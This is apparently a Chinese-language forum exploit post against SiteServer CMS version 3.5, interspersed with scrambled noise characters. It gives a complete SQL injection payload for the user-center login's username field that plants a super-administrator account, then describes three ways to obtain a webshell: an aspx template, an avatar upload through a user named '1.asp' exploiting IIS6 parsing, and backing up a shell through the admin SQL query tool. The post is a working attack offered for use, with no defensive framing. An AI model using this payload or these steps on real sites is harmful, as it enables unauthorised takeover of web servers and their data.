经测试秒杀最新的3.5版
* @. {3 f* `: Hstieserver官网:www.siteserver.cn
# w8 @# c" a6 I4 s. ZEXP:( }" Z9 g! s2 @8 v
直接访问UserCenter/login.aspx7 ~: b# t {! @7 A2 {* y' Y
用户名处输入:: D( F# s, c0 H0 `6 |( H9 K
# \1 j; _. Q& ]$ f
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–7 E0 b# k3 x/ ~( x- z$ t, ?
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
( Z. O# e, d: [. _0 ~之后再访问后台SiteServer/login.aspx用插入的用户登陆
1 x, e1 p! i d% W* a U; n. m后台拿webshell的三种方法:
6 g L9 M" i" ]- t一、
+ U3 a4 [; |* p* d; E5 o1 @站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
! X! m4 Q3 n; {; S0 u二、
4 Z n2 Q' o$ M8 E5 O! O/ J( ^成员权限-》添加用户-》用户名为:1.asp
% x! O* ^! F* Q n2 ehttp://127.0.0.1/usercenter/
) F/ g) u7 a6 v; ~$ p用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell5 i% Q9 U& ^9 f
(ps:后台添加用户时不会验证是否含有非法字符)! J. W0 {" |" T
三、
' k3 }; H& h1 {0 r系统工具-》实用工具-》机器参数查看5 f0 e' H* g' t9 ^4 X9 X
可以看到数据库类型、名称,WEB路径" @1 U5 n( {, k. |4 l- I7 {! c
系统工具-》数据库工具-》SQL语句查询
0 {1 h7 I! G" {5 Z这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |